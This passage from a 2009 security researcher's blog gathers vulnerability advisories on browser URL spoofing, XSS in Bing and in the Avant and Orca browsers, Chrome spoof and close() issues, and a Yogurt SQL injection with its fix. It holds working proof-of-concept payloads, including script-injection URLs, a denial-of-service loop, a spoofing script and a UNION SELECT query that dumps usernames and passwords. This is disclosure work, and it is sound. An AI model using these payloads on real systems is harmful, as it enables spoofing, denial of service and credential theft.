2 - Lunascape 5.1.3 and 5.1.4 (swiched to Trident engine)<br />
open urlspoof via file c:/test/urlspoof.html and click<br />
in any spoof function in al cases Lunascape show the <br />
spoofed url and content spoofed.<br />
<br />
3 - Orca browser 1.2 build 2 seems not vulnerable ,but wen browse the file<br />
the browsers add to url wyciwyg://4/ and executes the fake content.<br />
<br />
4 - Flock 2.5.1<br />
open urlspoof via file c:/test/urlspoof.html and clik<br />
in any spoof function in all cases Flock show the <br />
spoofed url and content spoofed.<br />
<br />
5 - K-Meleon 1.5.3 <br />
open urlspoof via file c:/test/urlspoof.html and click<br />
in any spoof function in all cases K-Meleon show the <br />
spoofed url and content spoofed.<br />
<br />
6 - SeaMonkey 1.1.17<br />
open urlspoof via file c:/test/urlspoof.html and click<br />
in any spoof function in all cases SeaMonkey show the <br />
spoofed url and content spoofed.<br />
<br />
7 - Avant browser 11.7 build 36<br />
open urlspoof via file c:/test/urlspoof.html and click<br />
in any spoof function in all cases Avant show the <br />
spoofed url and content spoofed.<br />
<br />
<br />
Google chrome 2.0.172.39 (Build oficial )<br />
write in all tree cases in about:blank.<br />
<br />
Internet Explorer 8 seems not vulnerable via file: protocol<br />
<br />
<br />
########################<br />
Remote afected Browsers<br />
########################<br />
<br />
For this test up the file to a server<br />
and browse to file via http://host.com/urlspoof.html<br />
<br />
1 - Internet explorer 7 and 8<br />
Browse to file and click in any link, the browser in all<br />
tree test show the spoofed file, spoofed path , and "pseudo-bypass"<br />
auth basic protection.<br />
<br />
2 - Avant browser 11.7 build 35 and build 36<br />
Browse to file and click in any link, the browser in all<br />
tree test show the spoofed file, spoofed path , and "pseudo-bypass"<br />
auth basic protection.<br />
<br />
3 - Lunascape 5.1.3 and 5.1.4 (swiched to Trident engine)<br />
Browse to file and click in any link, the browser in all<br />
tree test show the spoofed file, spoofed path , and "pseudo-bypass"<br />
auth basic protection.<br />
<br />
4 - Maxthon Browser 2.5.3.80 UNICODE <br />
Browse to file and click in any link, the browser in all<br />
tree test show the spoofed file, spoofed path , and "pseudo-bypass"<br />
auth basic protection.<br />
<br />
Google chrome write in all cases in about:blank<br />
<br />
#################<br />
Trap issue<br />
#################<br />
<br />
All of afected browsers , wen you are in the Fake url<br />
wen you try to reload or refresh the location , via ctrl+f5<br />
or f5 or similar the browser not show a 404 http error,<br />
it continue showing the fake page location.<br />
it is very interesting , because a attacker can create a "ghost" file<br />
in a "ghost" path.<br />
in the case of the fake File, we can spoof any web page on the server<br />
with the fake page and wen the user try to reload it or refresh <br />
the browser shows the fake page not the real page location.<br />
<br />
##################€nd ##################<br />
<br />
Thnx to cLimbo for Spread the Word<br />
Thnx to estrella to be my ligth.<br />
Thnx to all Lostmon Groups Team.<br />
<br />
-- <br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-36115123082602014122009-08-13T12:41:00.004-07:002009-08-13T13:44:04.515-07:00Bing.com WebmasterAuthenticationInformationPage.aspx XSS###########################################<br />Bing.com WebmasterAuthenticationInformationPage.aspx XSS<br />vendor url:http://ww.bing.com<br />advisore:http://lostmon.blogspot.com/2009/08/<br />bingcom-webmasterauthenticationinformat.html<br />vendor notify: yes vendor confirmed:yes<br />###########################################<br /><br />Bing search engine contains a flaw that allows a remote cross site<br />scripting attack.This flaw exists because the application does not<br />validate properly 'authTag' variable upon submission to the <br />'WebmasterAuthenticationInformationPage.aspx' script.This could <br />allow a user to create a specially crafted URL that would execute <br />arbitrary code in a user's browser within the trust relationship<br />between the browser and the server,leading to a loss of integrity.<br /><br /><a href="http://www.spymac.com/upload/2009/08/13/OyQTAItMeV.gif" target="_blank"><center><img src="http://www.spymac.com/upload/2009/08/13/OyQTAItMeV.gif" height="250" width="400"></center></a><br />them a attacker can compose a malformed link in the variable<br />from WebmasterAuthenticationInformationPage.aspx and Look the <br />result code , it is write in two boxes and in the file <br />'LiveSearchSiteAuth.xml'<br /><br />A remote user can compose a malformed link in the variable <br />from WebmasterXMLAuthDownloadPage.aspx ,wen download file<br />LiveSearchSiteAuth.xml this file have the malicious code.<br /><br />#########<br />solution:<br />##########<br /><br />Vendor patch<br /><br />#############<br />timeline:<br />#############<br /><br />discovered: 18-jun-2009<br />vendor notified: 07-08-2009<br />vendor response: 07-08-2009<br />vendor patch response: 13-08-2009<br />disclosure: 13-08-2009<br /><br /><br />################ End #####################<br /><br />Thnx to Microsoft Security Response Center (MSRC)<br />http://blogs.technet.com/msrc/<br />thnx to estrella to be my ligth<br />thnx to all who day after day support me !!!<br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente...<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-30769116850961579982009-08-03T07:04:00.007-07:002009-08-12T02:01:26.938-07:00Internet explorer pwned Avant Browser###########################################<br />Internet explorer pwned Avant Browser via<br />history Persistent XSS vulnerabilities <br />vendor url: http://www.avantbrowser.com/<br />Advisore: http://lostmon.blogspot.com/2009/08/<br />internet-explorer-pwned-avant-browser.html<br />vendor notify: NO exploit available: yes<br />############################################<br /><br />#############<br />description<br />#############<br /><br />Avant Browser´s user-friendly interface brings a new level<br />of clarity and efficiency to your browsing experience,and<br />frequent upgrades have steadily improved its reliability.<br />Avant Browser is freeware That's right. 100% Free!.<br /><br />A recently vulnerability in Avant browser discovered by me<br />Can be exploit via history on ie8<br /><br />Related Vuln =><br /><br />http://lostmon.blogspot.com/2009/07/<br />avant-browser-browserhome-persistent.html<br /><br />###############<br />version tested<br />###############<br /><br />Internet Explorer 8 (in xp home)<br /><br />Avant Browser 11.7 build 35<br /><br />#########<br />solution:<br />##########<br /><br />Update to version 11.7 build 36<br />it is reported and tested that isn´t<br />vulnerable.<br /><br />#############<br />timeline:<br />#############<br /><br />discovered: 23-07-2009<br />disclosure: 03-08-2009<br /><br />##################<br />testing<br />##################<br /><br /><br />http://lostmon.blogspot.com/2009/07/<br />avant-browser-browserhome-persistent.html<br /><br />See this related vulnerability in avant browser.Now go <br />to exploit it across explorer , we know that the column <br />history is afected by a script insercion in browser:home <br />dinamicaly content.<br /><br />If a user open explorer and try to navigate to a malicious <br />site like :<br />http://usuarios.lycos.es/reyfuss/id.php?id="><h1>Test html injection</h1><br /><br />For example if we Browse this url with avant browser =><br />http://usuarios.lycos.es/reyfuss/id.php?id="><iframe src='http://www.google.com'></iframe><br /><br />The iframe does not executed correctly in history, but , <br />close avant, browse the url with IE8 and them , open <br />avant browser ...the iframe now is executed correctly :D<br /><br />Those url are saved in the explorer history, here is the<br />vulnerability, because Avant browser use IE8 web history<br />to show his own history in the browser:home history column, <br />them open avant browser and the html is executed in the history<br />colum and in most visited sites.<br /><br />I don´t know if with the anty-xss filter in IE8 can protect <br />from a script attack but at this moment we can think that this<br />issue can have a html injection condition and a attacker can insert<br />a iframe...And this is other vector to attack Avant browser.<br /><br />################ End #####################<br /><br />thnx to estrella to be my ligth<br />thnx to Brink he is investigate with me.<br />thnx to all who day after day support me !!!<br />atentamente:<br />--<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente...<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-72891066757611828422009-07-31T05:03:00.009-07:002009-08-13T02:57:37.351-07:00Orca Browser browser:home Persistent XSS vulnerability###########################################<br />Orca Browser browser:home Persistent XSS vulnerability<br />vendor url: http://www.orcabrowser.com/<br />Advisore: http://lostmon.blogspot.com/2009/07/<br />orca-browser-browserhome-persistent-xss.html<br />vendor notify: NO exploit available: yes<br />############################################<br /><br />#############<br />description<br />#############<br /><br />Orca Browser´s user-friendly interface brings a new level<br />of clarity and efficiency to your browsing experience,and <br />frequent upgrades have steadily improved its reliability.<br />Avant Browser is freeware That's right. 100% Free!.<br /><br />Orca Browser contains a flaw that allows a remote cross site<br />scripting attack.This flaw exists because the application does<br />not validate properly the url links upon submission to the <br />bookmarks in browser:home page.<br />This could allow a user to create a specially crafted URL or a <br />bookmark that would execute arbitrary code in a user's browser<br />within the trust relationship between the browser and the server<br />wen try to load browser:home ,leading to a loss of integrity.<br /><br />###############<br />version tested<br />###############<br /><br />Avant Browser 1.2 build 2<br /><br />#########<br />solution:<br />##########<br /><br />Update to version 1.2. build 3<br />this version address this vulnerability.<br /><br /><br />#############<br />timeline:<br />#############<br /><br />discovered: 23-jul-2009<br />disclosure: 30 jul 2009<br /><br />##################<br />testing<br />##################<br /><br />Demostration Video => http://www.spymac.com/details/?2417793<br /><br />Open Orca Browser and by default the browser load<br />'browser:home' page. in this page we can view tree <br />columns , 1 top sites 2 history and 3 recent bookmarks.<br /><br />Bookmarks column is vulnerable to a xss. let´s go<br />to demostrate.<br />I make a web page posible vulnerable to a xss condition<br /><br /><?<br />$cmd=$_GET[id]<br />?><br /><br />I place a online doc for demo here =><br />http://usuarios.lycos.es/reyfuss/id.php?id=<br /><br />open Orca browser and navigate to <br /> <br />http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script><br />click in bookmark Tool bar and click in new bookmark and add this url.<br /><br />Load browser:home or close and open the browser , the script <br />is executed in bookmarks column.<br /><br /><br />################ End #####################<br /><br />thnx to estrella to be my ligth<br />thnx to Brink he is investigate with me.<br />thnx to all who day after day support me !!!<br />atentamente:<br />--<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente...<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-49076605205914974972009-07-30T10:11:00.007-07:002009-08-12T02:01:48.167-07:00Avant Browser browser:home Persistent XSS vulnerabilities###########################################<br />Avant Browser browser:home Persistent XSS vulnerabilities<br />vendor url: http://www.avantbrowser.com/<br />Advisore: http://lostmon.blogspot.com/2009/07/<br />avant-browser-browserhome-persistent.html<br />vendor notify: NO exploit available: yes<br />############################################<br /><br />#############<br />description<br />#############<br /><br />Avant Browser´s user-friendly interface brings a new level<br />of clarity and efficiency to your browsing experience,and <br />frequent upgrades have steadily improved its reliability.<br />Avant Browser is freeware That's right. 100% Free!.<br /><br />Avant Browse contains a flaw that allows a remote cross site<br />scripting attack.This flaw exists because the application does<br />not validate properly the url links upon submission to the <br />history, bookmarks and top sites visited in browser:home page.<br />This could allow a user to create a specially crafted URL or a <br />bookmark that would execute arbitrary code in a user's browser<br />within the trust relationship between the browser and the server<br />wen try to load browser:home ,leading to a loss of integrity.<br /><br />###############<br />version tested<br />###############<br /><br />Avant Browser 11.7 build 35<br /><br />#########<br />solution:<br />##########<br /><br />Update to version 11.7 build 36<br />it is reported and tested that isn´t<br />vulnerable.<br /><br /><br />#############<br />timeline:<br />#############<br /><br />discovered: 23-jul-2009<br />disclosure: 30 jul 2009<br /><br />##################<br />testing<br />##################<br /><br />Demostration Video => http://www.spymac.com/details/?2417793<br />Open Avant Browser and by default the browser load<br />'browser:home' page. in this page we can view tree <br />columns , 1 top sites 2 history and 3 recent bookmarks.<br /><br />All tree colums are prone vulnerables to a xss let´s go<br />to demostrate it in the tree cases.<br />I make a web page posible vulnerable to a xss condition<br /><br /><?<br />$cmd=$_GET[id]<br />?><br /><br />I place a online doc for demo here =><br />http://usuarios.lycos.es/reyfuss/id.php?id=<br /><br />open avant browser and navigate to <br />http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script><br />wait until load , and them close the browser <br />or open Browser:home URI.<br /><br />The script is executed and we have two columns afected,<br />the first and the second.<br /><br />go to tools menu and delete history ...<br /><br />open avant browser and go to <br />http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script><br /><br />rigth click and select add bookmark and add it.<br /><br />load again browser:home and the xss is executed<br />in bookmarks column.<br /><br />So if we for example like to deny the access to<br />browser:home we can load =><br />http://usuarios.lycos.es/reyfuss/id.php?id="><script>window.close()</script><br />and wen open the broser and load browser:home on load, <br />the script close it.<br /><br />so if we like to denial the service we can load =><br />http://usuarios.lycos.es/reyfuss/id.php?id="><script>while(1)alert(1)</script><br /><br />################ End #####################<br /><br />thnx to estrella to be my ligth<br />thnx to Brink he is investigate with me.<br />thnx to all who day after day support me !!!<br />atentamente:<br />--<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente...<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-44467196907230994672009-07-29T09:50:00.005-07:002009-07-31T05:13:35.779-07:00Bing.com Search engine, cache.aspx XSS###########################################<br />Bing.com Search engine, cache.aspx XSS<br />vendor url:http://ww.bing.com<br />advisore:http://lostmon.blogspot.com/2009/07/<br />bingcom-search-engine-cacheaspx-xss.html<br />vendor notify: yes vendor confirmed:yes<br />###########################################<br /><br />Bing search engine contains a flaw that allows a remote cross site<br />scripting attack.This flaw exists because the application does not<br />validate properly 'q' variable upon submission to the 'cache.aspx'<br />script.This could allow a user to create a specially crafted URL<br />that would execute arbitrary code in a user's browser within the<br />trust relationship between the browser and the server,leading to <br />a loss of integrity.<br /><br /><a href="http://www.spymac.com/upload/2009/07/29/fJwDIMgRpo.gif" target="_blank"><center><img src="http://www.spymac.com/upload/2009/07/29/fJwDIMgRpo.gif" height="250" width="400"></center></a><br><br /><a href="http://www.spymac.com/upload/2009/07/29/KWAwcolFyX.gif" target="_blank"><center><img src="http://www.spymac.com/upload/2009/07/29/KWAwcolFyX.gif" height="250" width="400"></center></a><br /><br />#########<br />solution:<br />##########<br /><br />No Solution At this Time.<br />but microsoft planing to patch it<br />in the new release code from bing.<br /><br />#############<br />timeline:<br />#############<br /><br />discovered: 08-jun-2009<br />vendor notified: 11 jun 2009<br />vendor response: 11 jun 2009<br />vendor last response: 30 jun 2009<br />disclosure: 29 jul 2009<br /><br /><br />################ End #####################<br /><br />thnx to estrella to be my ligth<br />thnx to Brink he is investigate with me.<br />thnx to all who day after day support me !!!<br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente...<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-14585415353226402672009-07-28T08:29:00.004-07:002009-07-28T08:37:51.371-07:00Google Chrome About:blank spoof#######################################<br />Google Chrome About:blank spoof<br />vendor url:www.google.com<br />advisore:http://lostmon.blogspot.com/2009/07/<br />google-chrome-aboutblank-spoof.html<br /><br />vendor nbotify:YES exploit avalilable:YES<br />########################################<br /><br />issue :=>http://code.google.com/p/chromium/issues/detail?id=17876<br /><br /><br />Chrome Version :2.0.172.37 (Build oficial )<br />URLs (if applicable) :<br />Other browsers tested:<br /> Add OK or FAIL after other browsers where you have tested this issue:<br /> Safari 4: FAIL<br /> Firefox 3.x: FAIL<br /> IE 7: OK<br /> IE 8: OK<br /><br />What steps will reproduce the problem?<br />1.Open The exploit page<br />2.click in the link<br />3.look about:blank page<br /><br />What is the expected result?<br />show a error page or search in google<br /><br />What happens instead?<br /><br />Write in About:blank Page<br /><br /><br />Please provide any additional information below. Attach a screenshot if<br />possible.<br /><br />########################<br />Sample code<br />########################<br /><br /></script><br /><br /><center><br /><h1>Chrome about:blank Spoof</h1><br /></center><br /><br />This vulnerability is based on http://www.securityfocus.com/bid/35829/ and <br />http://www.securityfocus.com/bid/35803<br />by Juan Pablo Lopez Yacubian and Michael Wood.<br /><br /><p><br /><a href='javascript:spoof()'><<h2>test Spoof !!</h2></a><br /><p><br /><br /><br /><script><br />function spoof()<br />{<br /><br />a = window.open('http://www.example.com%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20,')<br />a.document.write('<H1>FAKE PAGE<\h1>')<br />a.document.write('<title>test</title>')<br />a.stop ();<br />}<br /></script><br />####################€nd#####################<br />thank to all Lostmon groups team<br />Thnx to estrella to be my ligth<br /><br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-86446096147649627992009-07-08T01:21:00.007-07:002009-08-03T13:43:10.740-07:00Acknowledgments from Microsoft online services.<div style="text-align: center;"><b>Security Researcher Acknowledgments </b></div><div><div style="text-align: center;"><b>for Microsoft Online Services</b></div><div><br /><div style="text-align: justify;">The Microsoft Security Response Center (MSRC) is pleased to recognize the security researchers who have helped make Microsoft online services safer by finding and reporting security vulnerabilities. Each name listed represents an individual or company who has responsibly disclosed one or more security vulnerabilities in our online services and worked with us to remediate the issue.</div><a href="http://technet.microsoft.com/en-us/security/cc308575.aspx#0609">http://technet.microsoft.com/en-us/security/cc308575.aspx#0609</a><br /><br /></div><div>June 2009 Security Researchers<br /><br /><ul><li>Blue Moon Consulting<br />bluemoon.com.vn</li><br /><li><b>Lostmon Lords<br />lostmon.blogspot.com</b></li><br /><li>Security Team<br />dongabank.com.vn</li><br /><li>Nenad Vijatov<br />blog.vijatov.com</li></ul><br /></div><div>--</div><div><br /></div><div>thank to all Lostmon groups team</div><div>Thnx to estrella to be my ligth</div><div><br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: <a href="http://lostmon.blogspot.com/">http://lostmon.blogspot.com/</a><br />Google group: <a href="http://groups.google.com/group/lostmon">http://groups.google.com/group/lostmon</a> (new)<br />--<br />La curiosidad es lo que hace mover la mente....<br /></div></div><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-50188564716610732522009-07-07T10:04:00.007-07:002009-07-10T04:30:07.091-07:00Google Chrome close() issue##############################<br />Google Chrome close() issue<br />VENDOR: http://www.google.com/chrome/<br />article =http://lostmon.blogspot.com/<br />2009/07/google-chrome-close-issue.html<br />##############################<br /><pre><br />Chrome Version : 2.0.172.33 (Build oficial )<br /><b>URLs (if applicable) :</b><br /><b>Other browsers tested:</b><br /> Safari 4: OK<br /> Firefox 3.x:OK<br /> IE 7: OK<br /> IE 8: OK<br /><br /><b>What steps will reproduce the problem?</b><br /><br />1 - open a web page<br />2 - navigate to ther page.<br /><br />Google chrome automatic closes the tab and if we have<br />only one tab , it closes the process chrome.<br /><br /><b>What is the expected result?</b><br /><br />google chrome don´t close or prompt for close.<br /><br /><b>What happens instead?</b><br /><br />Google chrome closes the tab or if we have only<br />one tab it closse too without any confirmation.<br /><br />###########<br />Abstract<br />###########<br /><br />for test all of this need a instaled web server,<br />and some patience XDD<br /><br />#############<br />tesst 1<br />#############<br /><br />Create a new html document and write in:<br /><br /><html><body onload='close()'></body></html><br />save it as test1.html in c:\test\ for testing.<br /><br />1.1 - Open google Chrome and open it with file handler like<br /> file:///c:/test/test1.html<br /> Chrome does not close the window and nothing apears...<br /><br />1.2 - Open The file in a trust intranet zone via<br /> htttp://localhost/test/test1.html or via ip<br /> http://192.168.1.100/test/test1.html<br /> Chrome does not close the window and nothing apears...<br /><br /><br />1.3 - Open hard disk and select c:\test\test1.html rigth<br /> click and open with Google Chrome.<br /> Chrome open and close auth.<br /><br />if we change to other even like onblur ,with onfocus event<br />it´s interesting because if we try to use inspector to view<br />the source code, we click in body tag , and we close inspector<br />the tab is close too,this only aparently afects,wen we open the<br />html document with test mode 1.3<br /><br />so this issue aparently can´t exploit in a remote scenario.<br /><br />###############<br />test 2<br />###############<br /><br />create a new html file and wirte inside , and save it as<br />test2.html in the test folder.<br /><br /><html><br /><br /><head></head><br /><title>.:[-Google Chrome close() issue PoC By Lostmon-]:.</title><br /><body><br /><script><br />try { CloseCrome(); } catch(e) {<br />setTimeout("location.reload();",20);<br />close(); }<br /></script><br /><h2>.:[-Google Chrome close() issue PoC By Lostmon-]:.</h2><br /><br /><p>Google Chrome :2.0.172.33 (Build oficial )<br><br />WebKit 530.5<br>V8 1.1.10.13<br><br />User Agent Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)<br><br />AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5</p><br /></body><br /><br /></html><br /><br />2.1 - Open it via file protocol handler file:///c:/test/test2.html ,<br /> Chrome does not close the window and nothing aparently apears.<br /> but if we try to navigate to other site like www.google.com<br /> the tab closes auth.<br /><br />2.2 - Open it in trust web server http://localhost/test/test2.html ,<br /> or http://192.168.1.100/test/test2.html Chrome does not close<br /> the window and nothing aparently apears ;but if we try to navigate<br /> to other site like www.google.com the tab closes auth.<br /><br />2.3 - Open hard disk and select c:\test\test2.html rigth<br /> click and open with Google Chrome.<br /> Chrome open and close auth.<br /><br />##############<br />conclusion<br />##############<br /><br />This issue can be a vulnerability , and this can be used for<br />example to built malwares that can be tramp the browser in a<br />determinate location and if the user try to look the code<br />(onfocus)or try to navigate to other site (test2.html)or other<br />event,the window can close without interaction,them if a<br />malware or a malicious web page or a browser hijacker can<br />load as a default web page and them this can be a <br />Denial Of Service Condition</pre><br /><br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: <a href="http://lostmon.blogspot.com/">http://lostmon.blogspot.com/</a><br />Google group: <a href="http://groups.google.com/group/lostmon">http://groups.google.com/group/lostmon</a> (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-35791209901639163462009-06-27T14:16:00.003-07:002009-06-27T14:24:52.717-07:00Patch for Yogurt writemessage.php original Parameter SQL Injection###################################<br />Patch for Yogurt writemessage.php <br />original Parameter SQL Injection <br />vendor url:http://sourceforge.net/tracker/?group_id=112452<br />####################################<br /><br />This is a manual fix for the last discovered sql <br />injection vulnerability in yogurt social network<br /><br /><br />#########################<br />vulnerability references:<br />#########################<br /><br />http://osvdb.org/show/osvdb/55098<br />http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-2034<br />http://www.milw0rm.com/exploits/8932<br /><br />####################<br />SQL injection PoC<br />####################<br /><br />http://localhost/yogurt/system/writemessage.php?original=<br />-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,<br />6,7,8+from+users--<br /><br />###############<br />Specific vendor<br />###############<br /><br />http://sourceforge.net/tracker/?func=detail&aid=<br />2813318&group_id=112452&atid=663715<br /><br />###########<br />MANUAL FIX<br />###########<br /><br />open writemessage.php and look this code =><br /><br />Line 79: if (isset($_GET['original']))<br />Line 81: $rs = mysql_query("SELECT * FROM messages WHERE id=" .<br />$_GET['original'], $db)<br /><br />###############<br />change<br />################<br /><br />Line 81: $rs = mysql_query("SELECT * FROM messages WHERE id=" .<br />intval($_GET['original']), $db)<br /><br />####################€nd ########################<br /><br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-12103424737677260542009-06-15T09:58:00.007-07:002009-06-15T13:01:13.357-07:00Comtrend HG536+ poligon firmware tftp vuln##########################################<br />Comtrend HG536+ poligon firmware tftp vuln<br />Vendor url: www.comtrend.com<br />Vendor: www.adslzone.net/firmware-adslzone-poligon.html<br />Advisore Url:http://lostmon.blogspot.com/2009/06/<br />comtrend-hg536-poligon-firmware-tftp.html<br />Vendor notify: NO Exploit: see explanation.<br />#########################################<br /><br />##############<br />History<br />##############<br /><br />This is a extended research from those vulns =><br /><br />http://lostmon.blogspot.com/2009/04/comtrend-hg536-vulnerabilities.html<br /><br />And =><br /><br />http://www.securityfocus.com/bid/32975<br /><br />poligon firmware have all the same flaws.<br /><br />#####################<br />Description By vendor<br />Comtrend<br />#####################<br /><br />The HG536+ is an 802.11g (54Mbps) wireless and wired<br />Local Area Network (WLAN) ADSL router. Four 10/100<br />Base-T Ethernet ports provide wired LAN connectivity<br />with an integrated 802.11g WiFi WLAN Access Point for<br />wireless connectivity.<br /><br />###################<br />Description poligon<br />firmware by adslzone<br />####################<br /><br />Poligon ADSLzone comes from several firmwares manufacturers<br />and suppliers that use Internet (Asus, U.S. Robotics, Comm Net<br />, Broadcom, Deutsche Telekom, Alice Italy, Pirelli (Italy),<br />Bungury (Russia) and Vodafone (Thailand).<br /><br />################<br />Vulnerabilities<br />################<br /><br />This firmware have a flaw in tftp<br />service ,if a user have enable lan access<br />to tftp server and/or access from Wan ,<br />this router is prone vulnerable to a DoS<br />condition.<br /><br />in the configuration file we can look for<br />services enabled at this line =><br /><br />---------------------------------------------------<br />srvCtrlList ftp="lan" http="lan" icmp="lan"<br />snmp="disable" ssh="disable" telnet="lan" tftp="lan"<br />----------------------------------------------------<br /><br />in this case we have enabled tftp access from lan<br /><br />oks create a new html file for example tweaking.html<br 